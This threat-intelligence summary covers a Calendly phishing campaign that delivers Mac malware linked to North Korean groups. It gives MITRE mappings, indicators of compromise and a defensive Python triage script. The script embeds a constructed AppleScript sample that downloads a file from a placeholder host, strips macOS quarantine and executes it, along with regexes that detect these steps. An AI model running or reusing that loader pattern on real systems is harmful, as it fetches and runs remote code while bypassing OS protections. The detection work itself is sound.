Calendar Meeting Links Used to Spread Mac Malware – Krebs on Security

A scam campaign uses calendar-link phishing via Calendly to deliver macOS malware: attackers pose as cryptocurrency investors, invite the victim to a video call, and then redirect them to a fake meeting page. That page serves an AppleScript (.scpt) which downloads and runs a macOS trojan that researchers attribute to the North Korean groups BlueNoroff and Lazarus. Calendly says it is adding defenses, while researchers note a wave of Mac-focused information-stealing malware. #BlueNoroff #Lazarus #SignumCapital #CryptowaveCapital #macOS

Keypoints

  • The attack starts with a Calendly meeting invitation sent under the identity of an established investor, which lures the target into agreeing to a video call.
  • The scammer contacts the victim through a Telegram persona ("Ian Lee" of Signum Capital) and, citing a technical problem with the video platform, sends a replacement meeting link.
  • The replacement link leads to a fake meeting page that serves an AppleScript file (.scpt); running it downloads and executes a macOS trojan.
  • The malware is associated with the North Korean actor BlueNoroff, which SlowMist and other researchers link to Lazarus.
  • The fake meeting page and related phishing infrastructure are hosted on shared IP space (104.168.163.149) alongside other domains that impersonate crypto firms, including cryptowave.capital.
  • Built-in Mac defenses (XProtect signatures) lag behind rapidly evolving stealer families, underscoring the growth of Mac-focused threats.

MITRE Techniques

  • [T1566.002] Phishing: Spearphishing Link – The attacker used the "Add Custom Link" feature on Calendly event pages to insert a malicious link and lure the target into clicking it. ‘SlowMist says the North Korean phishing scams used the “Add Custom Link” feature of the Calendly meeting scheduling system on event pages to insert malicious links and initiate phishing attacks.’
  • [T1059.005] Command and Scripting Interpreter: AppleScript – The victim ran an AppleScript file (.scpt) that downloads and executes malware on macOS. ‘The file that Doug ran is a simple Apple Script (file extension “.scpt”) that downloads and executes a malicious trojan made to run on macOS systems.’
  • [T1105] Ingress Tool Transfer – The script fetched the trojan payload from attacker infrastructure onto the victim's Mac. ‘downloads and executes a malicious trojan made to run on macOS systems.’
  • [T1036] Masquerading – The .scpt was delivered under the pretext of fixing a problem with the video platform, so the victim ran it believing it was a benign workaround. The persona impersonation itself (posing as Ian Lee of Signum Capital) is social engineering in support of the phishing lure rather than artifact masquerading in the ATT&CK sense. ‘the attacker impersonate established cryptocurrency investors and ask to schedule a video conference call.’
  • [T1562.001] Impair Defenses: Disable or Modify Tools – The page's evidence for this mapping is weak: the quoted passage describes stealer families evading XProtect's signatures, which is defense evasion, not the disabling or modification of XProtect that T1562.001 requires. Treat this entry as signature evasion unless the sample is shown to tamper with macOS security tooling. ‘Recent updates to macOS’s XProtect signature database indicate that Apple are aware of the problem, but early 2024 has already seen a number of stealer families evade known signatures.’
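
The T1059.005 and T1105 entries above describe the loader pattern: an AppleScript whose `do shell script` calls fetch a payload and run it. The following is an added triage example, not code from the Krebs article or from the malware it describes. It assumes the analyst has first decompiled the .scpt with Apple's `osadecompile` (a standard macOS tool) and works on the resulting AppleScript source; the sample script embedded below is constructed for the demonstration and is not the attacker's file, and the URL and paths in it are hypothetical.

```python
"""Static triage of AppleScript source for download-and-execute behaviour.

Added example (not the article's or the malware author's code). Run
`osadecompile suspicious.scpt` on macOS to obtain the source text, then
feed it to triage(). The SAMPLE_SOURCE below is constructed for the demo.
"""
import re
from dataclasses import dataclass, field

# Constructed sample in the shape the article describes: fetch a binary,
# strip quarantine, make it executable, run it. Hypothetical URL and paths.
SAMPLE_SOURCE = '''
set dl to "https://meeting-fix.example/patch"   -- hypothetical URL
set dst to "/tmp/.fix"
do shell script "curl -sL " & dl & " -o " & dst
do shell script "xattr -d com.apple.quarantine " & dst
do shell script "chmod +x " & dst & " && " & dst & " &"
display dialog "Your meeting client has been updated."
'''

# Behaviours worth flagging inside a `do shell script` payload.
SUSPICIOUS = {
    "download":         re.compile(r"\b(curl|wget)\b"),
    "quarantine_strip": re.compile(r"xattr\s+-[a-z]*d[a-z]*\s+com\.apple\.quarantine"),
    "make_executable":  re.compile(r"chmod\s+[ugoa]*\+?[rwx]*x"),
    "temp_path":        re.compile(r"(/tmp/|/var/tmp/|/private/tmp/)\S*"),
}
STRING_RE = re.compile(r'^"((?:[^"\\]|\\.)*)"$')          # one AppleScript string literal
SET_RE = re.compile(r"^\s*set\s+(\w+)\s+to\s+(.+?)\s*$")   # set var to <expr>
DSS_RE = re.compile(r"^\s*do shell script\s+(.+?)\s*$")    # do shell script <expr>
ADMIN_RE = re.compile(r"\s+with administrator privileges\b.*$")


@dataclass
class Finding:
    line_no: int
    command: str            # shell command after resolving string concatenation
    tags: list[str] = field(default_factory=list)


def _strip_comment(line: str) -> str:
    """Drop a trailing `--` comment, ignoring `--` inside string literals."""
    inq = esc = False
    for i, ch in enumerate(line):
        if esc:
            esc = False
            continue
        if ch == "\\" and inq:
            esc = True
            continue
        if ch == '"':
            inq = not inq
        elif not inq and line.startswith("--", i):
            return line[:i]
    return line


def _split_concat(expr: str) -> list[str]:
    """Split an AppleScript expression on the `&` concatenation operator (outside quotes)."""
    parts, cur, inq, esc = [], [], False, False
    for ch in expr:
        if esc:
            cur.append(ch); esc = False; continue
        if ch == "\\" and inq:
            cur.append(ch); esc = True; continue
        if ch == '"':
            inq = not inq
        if ch == "&" and not inq:
            parts.append("".join(cur).strip()); cur = []; continue
        cur.append(ch)
    parts.append("".join(cur).strip())
    return parts


def _resolve(expr: str, env: dict[str, str]) -> str:
    """Evaluate literals and previously `set` variables; mark anything else as <unresolved>."""
    out = []
    for part in _split_concat(expr):
        m = STRING_RE.match(part)
        if m:
            out.append(re.sub(r"\\(.)", lambda e: {"n": "\n", "t": "\t", "r": "\r"}.get(e.group(1), e.group(1)), m.group(1)))
        elif part in env:
            out.append(env[part])
        else:
            out.append(f"<{part}>")
    return "".join(out)


def extract_shell_commands(source: str) -> list[tuple[int, str, bool]]:
    """Return (line_no, resolved_command, asks_for_admin) for each `do shell script`."""
    env, cmds = {}, []
    for n, raw in enumerate(source.splitlines(), 1):
        line = _strip_comment(raw).strip()
        m = SET_RE.match(line)
        if m:
            env[m.group(1)] = _resolve(m.group(2), env)
            continue
        m = DSS_RE.match(line)
        if m:
            expr = m.group(1)
            admin = bool(ADMIN_RE.search(expr))
            cmds.append((n, _resolve(ADMIN_RE.sub("", expr), env), admin))
    return cmds


def triage(source: str) -> list[Finding]:
    findings = []
    for n, cmd, admin in extract_shell_commands(source):
        tags = [name for name, rx in SUSPICIOUS.items() if rx.search(cmd)]
        if admin:
            tags.append("admin_prompt")   # script would pop a password dialog
        findings.append(Finding(n, cmd, tags))
    return findings


def verdict(findings: list[Finding]) -> str:
    """A download plus an execute/quarantine-bypass step is the loader pattern."""
    seen = {t for f in findings for t in f.tags}
    if "download" in seen and {"make_executable", "quarantine_strip"} & seen:
        return "download-and-execute loader"
    return "no loader pattern"


if __name__ == "__main__":
    results = triage(SAMPLE_SOURCE)
    for f in results:
        print(f"line {f.line_no}: {f.command!r} -> {f.tags}")
    print(verdict(results))
```

The resolver only follows simple `set ... to` assignments and `&` concatenation, which is enough for the "simple" loader the article describes; a script that builds its command from base64 or character codes will show up as `<unresolved>` fragments, which is itself a signal worth escalating. Commands that request `with administrator privileges` are tagged separately because the password prompt is often the moment a victim notices something is wrong.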

Indicators of Compromise

  • [IP Address] 104.168.163.149 – The host behind the fake meeting website that Doug was directed to.
  • [Domain] cryptowave.capital – Example domain used to mask a fake crypto firm (Cryptowave Capital).
  • [File] AppleScript (.scpt) – Malicious script served by the fake meeting page reached through the follow-up link (not by Calendly itself); when run, it downloads and executes a trojan on macOS. No file hash is given in the article.

Read more: https://krebsonsecurity.com/2024/02/calendar-meeting-links-used-to-spread-mac-malware/